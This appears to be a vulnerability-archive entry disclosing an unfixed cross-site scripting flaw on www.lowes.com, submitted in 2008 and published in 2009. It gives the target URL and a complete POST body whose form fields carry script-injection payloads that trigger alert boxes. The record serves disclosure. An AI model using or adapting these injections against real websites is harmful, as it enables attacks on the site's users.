Security researcher AppleJax submitted a cross-site scripting (XSS) vulnerability affecting www.lowes.com on 24/06/2008. At the time of submission the site ranked 787 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 24/06/2008
Date published: 10/06/2009
Status: UNFIXED
Author: AppleJax
Domain: www.lowes.com
Category: XSS
Pagerank: 787
URL: https://www.lowes.com/lowes/lkn?action=custSvcOrderIssue&topic=customerService
POST: firstName=%22%3E%3Cscript%3Ealert%28%271%27%29%3B%3C%2Fscript%3E&function=postForm&lastName=%22%3E%3Cscript%3Ealert%28%272%27%29%3B%3C%2Fscript%3E&emailAddress=%22%3E%3Cscript%3Ealert%28%273%27%29%3B%3C%2Fscript%3E@a.com&areaCode=111&telephoneNumber=1111111&zipCode=2222&orderNumber=%22%3E%3Cscript%3Ealert%28%274%27%29%3B%3C%2Fscript%3E&customerMessage=%3C%2FTEXTAREA%3E%22%3E%3Cscript%3Ealert%28%275%27%29%3B%3C%2Fscript%3E&submit=Send